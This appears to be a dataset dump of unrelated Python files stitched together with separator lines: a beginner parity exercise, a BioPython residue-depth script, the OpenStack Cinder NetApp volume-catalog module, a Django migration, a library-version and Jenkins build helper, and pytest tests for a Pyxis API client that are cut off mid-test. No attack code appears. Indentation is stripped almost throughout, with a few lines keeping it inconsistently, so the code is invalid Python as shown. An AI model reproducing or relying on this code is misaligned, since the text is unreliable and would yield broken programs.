print("\nYou're be able to ride when you're a little older.\n")
number = int(input("Enter a number, and I'll tell you if it's even or odd: "))
if number % 2 == 0:
print(f"\nThe number {number} is even.\n")
else:
print(f"\nthe number {number} is odd.\n")
'''
family = int(input('How many people are in your family group? '))
if family > 8:
print("\nYou must wait a moment.")
else:
print("\nYour table is set.") | nilq/baby-python | python |
'''
Get the residue depth for each residue in BioLiP
run as:
python -m ResidueDepth.Controller
'''
from Bio.PDB import PDBParser
from Bio.PDB import Selection
from Bio.PDB.ResidueDepth import get_surface, residue_depth, ca_depth
from Bio.PDB.Polypeptide import is_aa
import os
from AABindingSiteDist.Controller import BSParser
from PDBtools import GetFilewithPDB, CopyAndGunzip, GetStructure
from multiprocessing import Pool
import threading
DEBUG = False
PDBTOXYZ = "./ResidueDepth/msms/pdb_to_xyzr"
MSMS = "./ResidueDepth/msms/msms.x86_64Linux2.2.6.1"
OUTCA = "aveResCaDep.txt"
OUTALL = "aveResAllDep.txt"
OUT = "avedist2surface.txt"
BIOLIP_DIR = "./Data/bindingsite2.txt"
if DEBUG:
OUTCA = OUTCA + "_tmp"
OUTALL = OUTALL + "_tmp"
OUT = OUT + "_tmp"
# working directory
WDIR = "./ResidueDepth/tmp"
# thread safe for writing file
mutex_writefile = threading.Lock()
def GetResidueDepPDB(pdb, pdbfile):
s = GetStructure(pdb)
model = s[0]
residuelist = Selection.unfold_entities(model, 'R')
try:
surface = get_surface(pdbfile, PDBTOXYZ, MSMS)
except:
print "cannot get surface for " + pdbfile
return
content = ""
for residue in residuelist:
if not is_aa(residue):
continue
# minimun average depth for all atoms
resid = residue.get_id()
resname = residue.get_resname()
chainid = residue.get_parent().get_id()
try:
rd = residue_depth(residue, surface)
except:
continue
ca_rd = ca_depth(residue, surface)
info = [pdb, chainid, resid[1], resname, str(rd), str(ca_rd)]
        # skip this residue if any required field is missing
        if not all(info):
            continue
#print info
newline = "\t".join(map(str, info)) + "\n"
content = content + newline
mutex_writefile.acquire()
outobj = open(OUT, "a")
outobj.write(content)
outobj.close()
mutex_writefile.release()
def RemoveExistingPDB(pdblist):
existpdbs = []
newpdblist = []
for line in open(OUT):
content = line.split()
pdb = content[0]
if not pdb in existpdbs:
existpdbs.append(pdb)
print len(existpdbs)
for eachpdb in pdblist:
if not eachpdb in existpdbs:
newpdblist.append(eachpdb)
print len(newpdblist)
return newpdblist
def RunOnePDB(pdb):
outdir = os.path.join(WDIR, pdb)
pdbfile = GetFilewithPDB(pdb)
CopyAndGunzip(pdbfile, outdir)
GetResidueDepPDB(pdb, outdir)
def RunAllBioLiPPDB():
bslist = BSParser(BIOLIP_DIR)
pdblist = []
#try:
# os.remove(OUT)
#except:
# pass
for bs in bslist:
pdb = bs.pdbid
if not pdb in pdblist:
pdblist.append(pdb)
print "Number of PDBs before remove existing PDBs:", len(pdblist)
pdblist = RemoveExistingPDB(pdblist)
print "Number of PDBs after remove existing PDBs:", len(pdblist)
print "one example:", pdblist[0]
#for pdb in pdblist:
# print pdb
pool = Pool(processes = 5)
result = pool.map_async( RunOnePDB, pdblist)
resulttxt = result.wait()
print resulttxt
if __name__ == "__main__":
pdbfile = "./tmp/pdb110m.ent"
#GetResidueDepPDB("110m", pdbfile)
#RemoveExistingPDB("")
RunAllBioLiPPDB()
| nilq/baby-python | python |
# Copyright (c) 2012 NetApp, Inc. All rights reserved.
# Copyright (c) 2014 Ben Swartzlander. All rights reserved.
# Copyright (c) 2014 Navneet Singh. All rights reserved.
# Copyright (c) 2014 Clinton Knight. All rights reserved.
# Copyright (c) 2015 Tom Barron. All rights reserved.
# Copyright (c) 2015 Alex Meade. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Storage service catalog utility functions and classes for NetApp systems.
"""
import copy
import threading
from oslo_log import log as logging
from oslo_utils import timeutils
import six
from cinder import exception
from cinder.i18n import _, _LI, _LW
from cinder import utils
from cinder.volume.drivers.netapp.dataontap.client import api as netapp_api
from cinder.volume.drivers.netapp import utils as na_utils
LOG = logging.getLogger(__name__)
class NetAppVolume(object):
"""Represents a NetApp volume.
Present attributes
id - name, vserver, junction_path, type
aggr - name, raid_type, ha_policy, disk_type
sis - dedup, compression
state - status, vserver_root, cluster_volume,
inconsistent, invalid, junction_active
qos - qos_policy_group
space - space-guarantee-enabled, space-guarantee,
thin_provisioned, size_avl_bytes, size_total_bytes
mirror - mirrored i.e. dp mirror
export - path
"""
def __init__(self, name, vserver=None):
self.id = {}
self.aggr = {}
self.sis = {}
self.state = {}
self.qos = {}
self.space = {}
self.mirror = {}
self.export = {}
self.id['name'] = name
self.id['vserver'] = vserver
def __eq__(self, other):
"""Checks for equality."""
if (self.id['name'] == other.id['name'] and
self.id['vserver'] == other.id['vserver']):
return True
def __hash__(self):
"""Computes hash for the object."""
return hash(self.id['name'])
def __cmp__(self, other):
"""Implements comparison logic for volumes."""
self_size_avl = self.space.get('size_avl_bytes')
other_size_avl = other.space.get('size_avl_bytes')
if self_size_avl is None and other_size_avl is not None:
return -1
elif self_size_avl is not None and other_size_avl is None:
return 1
elif self_size_avl is None and other_size_avl is None:
return 0
elif int(self_size_avl) < int(other_size_avl):
return -1
elif int(self_size_avl) > int(other_size_avl):
return 1
else:
return 0
def __str__(self):
"""Returns human readable form for object."""
vol_str = "NetApp Volume id: %s, aggr: %s,"\
" space: %s, sis: %s, state: %s, qos: %s"\
% (self.id, self.aggr, self.space, self.sis, self.state, self.qos)
return vol_str
@utils.trace_method
def get_cluster_vols_with_ssc(na_server, vserver, volume=None):
"""Gets ssc vols for cluster vserver."""
volumes = query_cluster_vols_for_ssc(na_server, vserver, volume)
sis_vols = get_sis_vol_dict(na_server, vserver, volume)
mirrored_vols = get_snapmirror_vol_dict(na_server, vserver, volume)
aggrs = {}
for vol in volumes:
aggr_name = vol.aggr['name']
if aggr_name:
if aggr_name in aggrs:
aggr_attrs = aggrs[aggr_name]
else:
aggr_attrs = query_aggr_options(na_server, aggr_name)
if aggr_attrs:
eff_disk_type = query_aggr_storage_disk(na_server,
aggr_name)
aggr_attrs['disk_type'] = eff_disk_type
aggrs[aggr_name] = aggr_attrs
vol.aggr['raid_type'] = aggr_attrs.get('raid_type')
vol.aggr['ha_policy'] = aggr_attrs.get('ha_policy')
vol.aggr['disk_type'] = aggr_attrs.get('disk_type')
if sis_vols:
if vol.id['name'] in sis_vols:
vol.sis['dedup'] = sis_vols[vol.id['name']]['dedup']
vol.sis['compression'] =\
sis_vols[vol.id['name']]['compression']
else:
vol.sis['dedup'] = False
vol.sis['compression'] = False
if (vol.space['space-guarantee-enabled'] and
(vol.space['space-guarantee'] == 'file' or
vol.space['space-guarantee'] == 'volume')):
vol.space['thin_provisioned'] = False
else:
vol.space['thin_provisioned'] = True
if mirrored_vols:
vol.mirror['mirrored'] = False
if vol.id['name'] in mirrored_vols:
for mirr_attrs in mirrored_vols[vol.id['name']]:
if (mirr_attrs['rel_type'] == 'data_protection' and
mirr_attrs['mirr_state'] == 'snapmirrored'):
vol.mirror['mirrored'] = True
break
return volumes
@utils.trace_method
def query_cluster_vols_for_ssc(na_server, vserver, volume=None):
"""Queries cluster volumes for ssc."""
query = {'volume-attributes': None}
volume_id = {
'volume-id-attributes': {
'owning-vserver-name': vserver,
'type': 'rw',
'style': 'flex',
},
}
if volume:
volume_id['volume-id-attributes']['name'] = volume
query['volume-attributes'] = volume_id
des_attr = {'volume-attributes':
['volume-id-attributes',
'volume-space-attributes',
'volume-state-attributes',
'volume-qos-attributes']}
result = netapp_api.invoke_api(na_server, api_name='volume-get-iter',
api_family='cm', query=query,
des_result=des_attr,
additional_elems=None,
is_iter=True)
vols = set()
for res in result:
records = res.get_child_content('num-records')
if records > 0:
attr_list = res.get_child_by_name('attributes-list')
if attr_list:
vol_attrs = attr_list.get_children()
vols_found = create_vol_list(vol_attrs)
vols.update(vols_found)
return vols
@utils.trace_method
def create_vol_list(vol_attrs):
"""Creates vol list with features from attr list."""
vols = set()
for v in vol_attrs:
try:
# name and vserver are mandatory
# Absence will skip by giving KeyError.
name = v['volume-id-attributes']['name']
vserver = v['volume-id-attributes']['owning-vserver-name']
vol = NetAppVolume(name, vserver)
vol.id['type'] =\
v['volume-id-attributes'].get_child_content('type')
if vol.id['type'] == "tmp":
continue
vol.id['junction_path'] =\
v['volume-id-attributes'].get_child_content('junction-path')
# state attributes mandatory.
vol.state['vserver_root'] =\
na_utils.to_bool(
v['volume-state-attributes'].get_child_content(
'is-vserver-root'))
if vol.state['vserver_root']:
continue
vol.state['status'] =\
v['volume-state-attributes'].get_child_content('state')
vol.state['inconsistent'] =\
na_utils.to_bool(
v['volume-state-attributes'].get_child_content(
'is-inconsistent'))
vol.state['invalid'] =\
na_utils.to_bool(
v['volume-state-attributes'].get_child_content(
'is-invalid'))
vol.state['junction_active'] =\
na_utils.to_bool(
v['volume-state-attributes'].get_child_content(
'is-junction-active'))
vol.state['cluster_volume'] =\
na_utils.to_bool(
v['volume-state-attributes'].get_child_content(
'is-cluster-volume'))
if (vol.state['status'] != 'online' or
vol.state['inconsistent'] or vol.state['invalid']):
# offline, invalid and inconsistent volumes are not usable
continue
# aggr attributes mandatory.
vol.aggr['name'] =\
v['volume-id-attributes']['containing-aggregate-name']
# space attributes mandatory.
vol.space['size_avl_bytes'] =\
v['volume-space-attributes']['size-available']
vol.space['size_total_bytes'] =\
v['volume-space-attributes']['size-total']
vol.space['space-guarantee-enabled'] =\
na_utils.to_bool(
v['volume-space-attributes'].get_child_content(
'is-space-guarantee-enabled'))
vol.space['space-guarantee'] =\
v['volume-space-attributes'].get_child_content(
'space-guarantee')
# qos attributes optional.
if v.get_child_by_name('volume-qos-attributes'):
vol.qos['qos_policy_group'] =\
v['volume-qos-attributes'].get_child_content(
'policy-group-name')
else:
vol.qos['qos_policy_group'] = None
vols.add(vol)
except KeyError as e:
LOG.debug('Unexpected error while creating'
' ssc vol list. Message - %s', e)
continue
return vols
@utils.trace_method
def query_aggr_options(na_server, aggr_name):
"""Queries cluster aggr for attributes.
Currently queries for raid and ha-policy.
"""
add_elems = {'aggregate': aggr_name}
attrs = {}
try:
result = netapp_api.invoke_api(na_server,
api_name='aggr-options-list-info',
api_family='cm', query=None,
des_result=None,
additional_elems=add_elems,
is_iter=False)
for res in result:
options = res.get_child_by_name('options')
if options:
op_list = options.get_children()
for op in op_list:
if op.get_child_content('name') == 'ha_policy':
attrs['ha_policy'] = op.get_child_content('value')
if op.get_child_content('name') == 'raidtype':
attrs['raid_type'] = op.get_child_content('value')
except Exception as e:
LOG.debug("Exception querying aggr options. %s", e)
return attrs
@utils.trace_method
def get_sis_vol_dict(na_server, vserver, volume=None):
"""Queries sis for volumes.
If volume is present sis is queried for it.
Records dedup and compression enabled.
"""
sis_vols = {}
query_attr = {'vserver': vserver}
if volume:
vol_path = '/vol/%s' % (volume)
query_attr['path'] = vol_path
query = {'sis-status-info': query_attr}
try:
result = netapp_api.invoke_api(na_server,
api_name='sis-get-iter',
api_family='cm',
query=query,
is_iter=True)
for res in result:
attr_list = res.get_child_by_name('attributes-list')
if attr_list:
sis_status = attr_list.get_children()
for sis in sis_status:
path = sis.get_child_content('path')
if not path:
continue
(___, __, vol) = path.rpartition('/')
if not vol:
continue
v_sis = {}
v_sis['compression'] = na_utils.to_bool(
sis.get_child_content('is-compression-enabled'))
v_sis['dedup'] = na_utils.to_bool(
sis.get_child_content('state'))
sis_vols[vol] = v_sis
except Exception as e:
LOG.debug("Exception querying sis information. %s", e)
return sis_vols
@utils.trace_method
def get_snapmirror_vol_dict(na_server, vserver, volume=None):
"""Queries snapmirror volumes."""
mirrored_vols = {}
query_attr = {'source-vserver': vserver}
if volume:
query_attr['source-volume'] = volume
query = {'snapmirror-info': query_attr}
try:
result = netapp_api.invoke_api(na_server,
api_name='snapmirror-get-iter',
api_family='cm', query=query,
is_iter=True)
for res in result:
attr_list = res.get_child_by_name('attributes-list')
if attr_list:
snap_info = attr_list.get_children()
for snap in snap_info:
src_volume = snap.get_child_content('source-volume')
v_snap = {}
v_snap['dest_loc'] =\
snap.get_child_content('destination-location')
v_snap['rel_type'] =\
snap.get_child_content('relationship-type')
v_snap['mirr_state'] =\
snap.get_child_content('mirror-state')
if mirrored_vols.get(src_volume):
mirrored_vols.get(src_volume).append(v_snap)
else:
mirrored_vols[src_volume] = [v_snap]
except Exception as e:
LOG.debug("Exception querying mirror information. %s", e)
return mirrored_vols
@utils.trace_method
def query_aggr_storage_disk(na_server, aggr):
"""Queries for storage disks associated to an aggregate."""
query = {'storage-disk-info': {'disk-raid-info':
{'disk-aggregate-info':
{'aggregate-name': aggr}}}}
des_attr = {'storage-disk-info':
{'disk-raid-info': ['effective-disk-type']}}
try:
result = netapp_api.invoke_api(na_server,
api_name='storage-disk-get-iter',
api_family='cm', query=query,
des_result=des_attr,
additional_elems=None,
is_iter=True)
for res in result:
attr_list = res.get_child_by_name('attributes-list')
if attr_list:
storage_disks = attr_list.get_children()
for disk in storage_disks:
raid_info = disk.get_child_by_name('disk-raid-info')
if raid_info:
eff_disk_type =\
raid_info.get_child_content('effective-disk-type')
if eff_disk_type:
return eff_disk_type
else:
continue
except Exception as e:
LOG.debug("Exception querying storage disk. %s", e)
return 'unknown'
@utils.trace_method
def get_cluster_ssc(na_server, vserver):
"""Provides cluster volumes with ssc."""
netapp_volumes = get_cluster_vols_with_ssc(na_server, vserver)
mirror_vols = set()
dedup_vols = set()
compress_vols = set()
thin_prov_vols = set()
ssc_map = {'mirrored': mirror_vols, 'dedup': dedup_vols,
'compression': compress_vols,
'thin': thin_prov_vols, 'all': netapp_volumes}
for vol in netapp_volumes:
if vol.sis.get('dedup'):
dedup_vols.add(vol)
if vol.sis.get('compression'):
compress_vols.add(vol)
if vol.mirror.get('mirrored'):
mirror_vols.add(vol)
if vol.space.get('thin_provisioned'):
thin_prov_vols.add(vol)
return ssc_map
@utils.trace_method
def refresh_cluster_stale_ssc(*args, **kwargs):
"""Refreshes stale ssc volumes with latest."""
backend = args[0]
na_server = args[1]
vserver = args[2]
identity = six.text_type(id(backend))
lock_pr = '%s_%s' % ('refresh_ssc', identity)
try:
job_set = na_utils.set_safe_attr(
backend, 'refresh_stale_running', True)
if not job_set:
return
@utils.synchronized(lock_pr)
def refresh_stale_ssc():
stale_vols = backend._update_stale_vols(reset=True)
LOG.info(_LI('Running stale ssc refresh job for %(server)s'
' and vserver %(vs)s'),
{'server': na_server, 'vs': vserver})
# refreshing single volumes can create inconsistency
# hence doing manipulations on copy
ssc_vols_copy = copy.deepcopy(backend.ssc_vols)
refresh_vols = set()
expired_vols = set()
for vol in stale_vols:
name = vol.id['name']
res = get_cluster_vols_with_ssc(na_server, vserver, name)
if res:
refresh_vols.add(res.pop())
else:
expired_vols.add(vol)
for vol in refresh_vols:
for k in ssc_vols_copy:
vol_set = ssc_vols_copy[k]
vol_set.discard(vol)
if k == "mirrored" and vol.mirror.get('mirrored'):
vol_set.add(vol)
if k == "dedup" and vol.sis.get('dedup'):
vol_set.add(vol)
if k == "compression" and vol.sis.get('compression'):
vol_set.add(vol)
if k == "thin" and vol.space.get('thin_provisioned'):
vol_set.add(vol)
if k == "all":
vol_set.add(vol)
for vol in expired_vols:
for k in ssc_vols_copy:
vol_set = ssc_vols_copy[k]
vol_set.discard(vol)
backend.refresh_ssc_vols(ssc_vols_copy)
LOG.info(_LI('Successfully completed stale refresh job for'
' %(server)s and vserver %(vs)s'),
{'server': na_server, 'vs': vserver})
refresh_stale_ssc()
finally:
na_utils.set_safe_attr(backend, 'refresh_stale_running', False)
@utils.trace_method
def get_cluster_latest_ssc(*args, **kwargs):
"""Updates volumes including ssc."""
backend = args[0]
na_server = args[1]
vserver = args[2]
identity = six.text_type(id(backend))
lock_pr = '%s_%s' % ('refresh_ssc', identity)
# As this depends on stale job running state
# set flag as soon as job starts to avoid
# job accumulation.
try:
job_set = na_utils.set_safe_attr(backend, 'ssc_job_running', True)
if not job_set:
return
@utils.synchronized(lock_pr)
def get_latest_ssc():
LOG.info(_LI('Running cluster latest ssc job for %(server)s'
' and vserver %(vs)s'),
{'server': na_server, 'vs': vserver})
ssc_vols = get_cluster_ssc(na_server, vserver)
backend.refresh_ssc_vols(ssc_vols)
backend.ssc_run_time = timeutils.utcnow()
LOG.info(_LI('Successfully completed ssc job for %(server)s'
' and vserver %(vs)s'),
{'server': na_server, 'vs': vserver})
get_latest_ssc()
finally:
na_utils.set_safe_attr(backend, 'ssc_job_running', False)
@utils.trace_method
def refresh_cluster_ssc(backend, na_server, vserver, synchronous=False):
"""Refresh cluster ssc for backend."""
if not isinstance(na_server, netapp_api.NaServer):
raise exception.InvalidInput(reason=_("Backend server not NaServer."))
delta_secs = getattr(backend, 'ssc_run_delta_secs', 1800)
if getattr(backend, 'ssc_job_running', None):
LOG.warning(_LW('ssc job in progress. Returning... '))
return
elif (getattr(backend, 'ssc_run_time', None) is None or
(backend.ssc_run_time and
timeutils.is_older_than(backend.ssc_run_time, delta_secs))):
if synchronous:
get_cluster_latest_ssc(backend, na_server, vserver)
else:
t = threading.Timer(0, get_cluster_latest_ssc,
args=[backend, na_server, vserver])
t.start()
elif getattr(backend, 'refresh_stale_running', None):
LOG.warning(_LW('refresh stale ssc job in progress. Returning... '))
return
else:
if backend.stale_vols:
if synchronous:
refresh_cluster_stale_ssc(backend, na_server, vserver)
else:
t = threading.Timer(0, refresh_cluster_stale_ssc,
args=[backend, na_server, vserver])
t.start()
@utils.trace_method
def get_volumes_for_specs(ssc_vols, specs):
"""Shortlists volumes for extra specs provided."""
if specs is None or specs == {} or not isinstance(specs, dict):
return ssc_vols['all']
result = copy.deepcopy(ssc_vols['all'])
raid_type = specs.get('netapp:raid_type')
disk_type = specs.get('netapp:disk_type')
bool_specs_list = ['netapp_mirrored', 'netapp_unmirrored',
'netapp_dedup', 'netapp_nodedup',
'netapp_compression', 'netapp_nocompression',
'netapp_thin_provisioned', 'netapp_thick_provisioned']
b_specs = {}
for spec in bool_specs_list:
b_specs[spec] = na_utils.to_bool(specs.get(spec))\
if specs.get(spec) else None
def _spec_ineffect(b_specs, spec, opp_spec):
"""If the spec with opposite spec is ineffective."""
if ((b_specs[spec] is None and b_specs[opp_spec] is None)
or (b_specs[spec] == b_specs[opp_spec])):
return True
else:
return False
if _spec_ineffect(b_specs, 'netapp_mirrored', 'netapp_unmirrored'):
pass
else:
if b_specs['netapp_mirrored'] or b_specs['netapp_unmirrored'] is False:
result = result & ssc_vols['mirrored']
else:
result = result - ssc_vols['mirrored']
if _spec_ineffect(b_specs, 'netapp_dedup', 'netapp_nodedup'):
pass
else:
if b_specs['netapp_dedup'] or b_specs['netapp_nodedup'] is False:
result = result & ssc_vols['dedup']
else:
result = result - ssc_vols['dedup']
if _spec_ineffect(b_specs, 'netapp_compression', 'netapp_nocompression'):
pass
else:
if (b_specs['netapp_compression'] or
b_specs['netapp_nocompression'] is False):
result = result & ssc_vols['compression']
else:
result = result - ssc_vols['compression']
if _spec_ineffect(b_specs, 'netapp_thin_provisioned',
'netapp_thick_provisioned'):
pass
else:
if (b_specs['netapp_thin_provisioned'] or
b_specs['netapp_thick_provisioned'] is False):
result = result & ssc_vols['thin']
else:
result = result - ssc_vols['thin']
if raid_type or disk_type:
tmp = copy.deepcopy(result)
for vol in tmp:
if raid_type:
vol_raid = vol.aggr['raid_type']
vol_raid = vol_raid.lower() if vol_raid else None
if raid_type.lower() != vol_raid:
result.discard(vol)
if disk_type:
vol_dtype = vol.aggr['disk_type']
vol_dtype = vol_dtype.lower() if vol_dtype else None
if disk_type.lower() != vol_dtype:
result.discard(vol)
return result
@utils.trace_method
def check_ssc_api_permissions(client_cmode):
"""Checks backend SSC API permissions for the user."""
api_map = {'storage-disk-get-iter': ['netapp:disk_type'],
'snapmirror-get-iter': ['netapp_mirrored',
'netapp_unmirrored'],
'sis-get-iter': ['netapp_dedup', 'netapp_nodedup',
'netapp_compression',
'netapp_nocompression'],
'aggr-options-list-info': ['netapp:raid_type'],
'volume-get-iter': []}
failed_apis = client_cmode.check_apis_on_cluster(api_map.keys())
if failed_apis:
if 'volume-get-iter' in failed_apis:
msg = _("Fatal error: User not permitted"
" to query NetApp volumes.")
raise exception.VolumeBackendAPIException(data=msg)
else:
unsupp_ssc_features = []
for fail in failed_apis:
unsupp_ssc_features.extend(api_map[fail])
LOG.warning(_LW("The user does not have access or sufficient "
"privileges to use all netapp APIs. The "
"following extra_specs will fail or be ignored: "
"%s"), unsupp_ssc_features)
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('transmittals', '0047_auto_20160224_1220'),
]
operations = [
migrations.AlterField(
model_name='outgoingtransmittal',
name='latest_revision',
field=models.ForeignKey(verbose_name='Latest revision', to='transmittals.OutgoingTransmittalRevision', null=True),
),
migrations.AlterField(
model_name='transmittal',
name='latest_revision',
field=models.ForeignKey(verbose_name='Latest revision', to='transmittals.TransmittalRevision', null=True),
),
]
| nilq/baby-python | python |
"""
一键编译测试版本的app给qa:
1、改库版本号为测试版本号
2、改app的库依赖为测试版本号依赖
3、编库
4、编app
"""
import json
import sys
from base import sb_nexus, sb_jenkins, sb_config, sb_gitlab
def _print_task(task):
print(f'apps: {str(task["apps"])}')
print(f'libs: {str(task["libs"])}')
print(f'branch: {task["branch"]}')
print(f'release_note: {task["release_note"]}')
print(f'rebuild_lib: {task["rebuild_lib"]}')
def get_lib_test_version(sb_nxs, libs, rebuild_lib):
"""
获取所有库的测试版本号(-test-username-version)
:param sb_nxs:
:param libs:
:param rebuild_lib: True-重新升版本号,编译。False-使用已有的包。
:return:
"""
print(f'get lib test version: {len(libs)}')
lib_version_dict = {}
for lib in libs:
lib_test_version = sb_nxs.get_next_lib_version(lib, rebuild_lib)
print(f' {lib} -> {lib_test_version}')
if lib_test_version is None:
print(f' get {lib} test version fail')
return None
lib_version_dict[lib] = lib_test_version
return lib_version_dict
def get_lib_test_version_1(sb_gtlb, sb_nxs, libs, rebuild_lib):
"""
获取所有库的测试版本号(-test-username-version)
:param sb_nxs:
:param libs:
:param rebuild_lib: True-重新升版本号,编译。False-使用已有的包。
:return:
"""
print(f'get lib test version: {len(libs)}')
lib_version_dict = {}
for lib in libs:
latest_version = sb_gtlb.get_lib_latest_version(lib)
next_version = _get_next_lib_version(latest_version)
all_versions = sb_nxs.get_all_lib_version(lib)
lib_test_version = _get_test_lib_version(next_version, all_versions, rebuild_lib)
print(f' {lib} -> {lib_test_version}')
if lib_test_version is None:
print(f' get {lib} test version fail')
return None
lib_version_dict[lib] = lib_test_version
return lib_version_dict
def update_lib_version(sb_gtlb, branch, lib_version_dict, rebuild_lib):
"""
在库的指定分支上更新版本号
:param sb_gtlb:
:param branch:
:param lib_version_dict:
:param rebuild_lib:
:return:
"""
print(f'update lib version: {len(lib_version_dict)}')
if rebuild_lib:
for lib, version in lib_version_dict.items():
r = sb_gtlb.update_lib_version(branch, lib, version)
print(f' {lib} -> {r}')
if not r:
print(f' update {lib} version fail')
return False
else:
        print('  not rebuilding libs')
return True
def check_app_work_branch(sb_gtlb, apps, branch):
"""
检测app上面是否存在工作分支,不存在就创建
:param apps:
:param branch:
:return:
"""
print(f'check app work branch: {len(apps)}')
for app in apps:
exist = sb_gtlb.is_app_branch_exist(app, branch)
if exist:
print(f' {app} -> exist')
else:
create = sb_gtlb.create_app_branch(app, branch)
if create:
print(f' {app} -> create')
else:
print(f' create branch {branch} for {app} fail')
return False
return True
def update_app_dependencies(sb_gtlb, apps, branch, lib_version_dict):
"""
在app的工作分支上更新库的版本号为测试版本号
:param sb_gtlb:
:param apps:
:return:
"""
print(f'update app dependencies: {len(apps)}')
for app in apps:
r = sb_gtlb.update_app_dependencies_without_force(branch, app, lib_version_dict)
print(f' {app} -> {r}')
if not r:
print(f' update {app} dependencies fail')
return False
return True
def build_test_lib(sb_jks, libs, rebuild_lib, branch, release_note):
"""
编译测试的库
:param sb_jks:
:param libs:
:param rebuild_lib:
:param branch:
:param release_note:
:return:
"""
print(f'build test lib: {len(libs)}')
if rebuild_lib:
for lib in libs:
r = sb_jks.build_test_lib(lib, branch, release_note)
print(f' {lib} -> {r}')
if not r:
print(f' build {lib} fail')
return False
else:
        print('  not rebuilding libs')
return True
def build_test_app(sb_jks, apps, branch, release_note):
"""
编译测试app
:return:
"""
print(f'build test app: {len(apps)}')
for app in apps:
r = sb_jks.build_test_app(app, branch, release_note)
print(f' {app} -> {r}')
if not r:
print(f' build {app} fail')
return False
return True
def _get_next_lib_version(current_version):
"""
获取该版本号下一个版本号,3位4位分开处理
:param current_version:
:return:
"""
seg = current_version.split('.')
ver_len = len(seg)
if ver_len == 4:
idx = ver_len - 2
new_v = int(seg[idx]) + 1
seg[idx] = str(new_v)
return '.'.join(seg)
elif ver_len == 3:
idx = ver_len - 1
new_v = int(seg[idx]) + 1
seg[idx] = str(new_v)
return '.'.join(seg)
else:
        raise Exception(f'Library version {current_version} does not have 3 or 4 parts')
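# Examples of the bumping rule above (illustrative):
#   _get_next_lib_version('1.2.3')   -> '1.2.4'    (bumps the last of 3 parts)
#   _get_next_lib_version('1.2.3.4') -> '1.2.4.4'  (bumps the third of 4 parts)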
def _get_test_lib_version(next_version, all_version_list, rebuild_lib):
if next_version in all_version_list:
        raise Exception(f'The next version {next_version} has already been released; something went wrong.')
test_versions = []
test_version_prefix = next_version + '-test-hjf'
for v in all_version_list:
if test_version_prefix in v:
test_versions.append(v)
if test_versions:
def sort_key(e):
seg = e.split('-')
return int(seg[len(seg) - 1])
test_versions.sort(key=sort_key, reverse=True)
newest_test_version = test_versions[0]
if not rebuild_lib:
return newest_test_version
seg = newest_test_version.split('-')
seg[len(seg) - 1] = str(int(seg[len(seg) - 1]) + 1)
return '-'.join(seg)
else:
if not rebuild_lib:
            raise Exception('No existing test version is available; the library must be rebuilt')
return test_version_prefix + '-1'
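# Illustrative walk-through of the naming scheme above: if the next release
# version is '1.2.4' and '1.2.4-test-hjf-1' already exists, a rebuild yields
# '1.2.4-test-hjf-2'; with rebuild_lib=False the newest existing test
# version ('1.2.4-test-hjf-1') is reused as-is.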
def main():
task_file = sys.argv[1]
task = json.load(open(task_file))
# rebuild_lib deprecated, always True
task["rebuild_lib"] = True
_print_task(task)
    execute = input('Confirm the parameters are correct; continue? (y/n)')
if execute != 'y':
return 1
apps = task['apps']
libs = task['libs']
branch = task['branch']
release_note = task['release_note']
rebuild_lib = task['rebuild_lib']
sb_cfg = sb_config.SBConfig()
sb_nxs = sb_nexus.SBNexus(sb_cfg)
sb_gtlb = sb_gitlab.SBGitlab(sb_cfg)
sb_jks = sb_jenkins.SBJenkins(sb_cfg)
lib_version_dict = get_lib_test_version_1(sb_gtlb, sb_nxs, libs, rebuild_lib)
if not lib_version_dict:
return 2
ulv = update_lib_version(sb_gtlb, branch, lib_version_dict, rebuild_lib)
if not ulv:
return 3
cawb = check_app_work_branch(sb_gtlb, apps, branch)
if not cawb:
return 4
uad = update_app_dependencies(sb_gtlb, apps, branch, lib_version_dict)
if not uad:
return 5
btl = build_test_lib(sb_jks, lib_version_dict, rebuild_lib, branch, release_note)
if not btl:
return 6
bta = build_test_app(sb_jks, apps, branch, release_note)
if not bta:
return 7
return 0
if __name__ == '__main__':
    sys.exit(main())
| nilq/baby-python | python |
from typing import Any
from unittest.mock import MagicMock, patch
import pytest
from operatorcert import pyxis
from requests import HTTPError, Response
def test_is_internal(monkeypatch: Any) -> None:
assert not pyxis.is_internal()
monkeypatch.setenv("PYXIS_CERT_PATH", "/path/to/cert.pem")
monkeypatch.setenv("PYXIS_KEY_PATH", "/path/to/key.key")
assert pyxis.is_internal()
def test_get_session_api_key(monkeypatch: Any) -> None:
monkeypatch.setenv("PYXIS_API_KEY", "123")
session = pyxis._get_session()
assert session.headers["X-API-KEY"] == "123"
def test_get_session_cert(monkeypatch: Any) -> None:
monkeypatch.setenv("PYXIS_CERT_PATH", "/path/to/cert.pem")
monkeypatch.setenv("PYXIS_KEY_PATH", "/path/to/key.key")
session = pyxis._get_session()
assert session.cert == ("/path/to/cert.pem", "/path/to/key.key")
def test_get_session_no_auth(monkeypatch: Any) -> None:
with pytest.raises(Exception):
pyxis._get_session()
@patch("operatorcert.pyxis._get_session")
def test_post(mock_session: MagicMock) -> None:
mock_session.return_value.post.return_value.json.return_value = {"key": "val"}
resp = pyxis.post("https://foo.com/v1/bar", {})
assert resp == {"key": "val"}
@patch("operatorcert.pyxis._get_session")
def test_patch(mock_session: MagicMock) -> None:
mock_session.return_value.patch.return_value.json.return_value = {"key": "val"}
resp = pyxis.patch("https://foo.com/v1/bar", {})
assert resp == {"key": "val"}
@patch("operatorcert.pyxis._get_session")
def test_patch_error(mock_session: MagicMock) -> None:
response = Response()
response.status_code = 400
mock_session.return_value.patch.return_value.raise_for_status.side_effect = (
HTTPError(response=response)
)
with pytest.raises(HTTPError):
pyxis.patch("https://foo.com/v1/bar", {})
@patch("operatorcert.pyxis._get_session")
def test_put(mock_session: MagicMock) -> None:
mock_session.return_value.put.return_value.json.return_value = {"key": "val"}
resp = pyxis.put("https://foo.com/v1/bar", {})
assert resp == {"key": "val"}
@patch("operatorcert.pyxis._get_session")
def test_put_error(mock_session: MagicMock) -> None:
response = Response()
response.status_code = 400
mock_session.return_value.put.return_value.raise_for_status.side_effect = HTTPError(
response=response
)
with pytest.raises(HTTPError):
